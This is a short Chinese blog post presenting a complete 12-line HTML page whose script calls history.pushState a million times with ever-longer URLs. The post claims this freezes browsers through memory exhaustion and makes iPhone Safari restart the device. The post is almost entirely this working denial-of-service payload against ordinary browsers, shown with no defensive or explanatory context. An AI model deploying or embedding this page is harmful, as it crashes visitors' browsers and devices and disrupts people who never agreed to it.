12行代码 让浏览器崩溃,iPhone重启

<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
    total= total+i.toString();
    history.pushState(0,0,total);
}
</script>
</body>
</html> 浏览器访问,机器内存飙升,直至卡死
iPhone使用safiri访问,直接注销重启
上一篇:java 题库


下一篇:sql的集合运算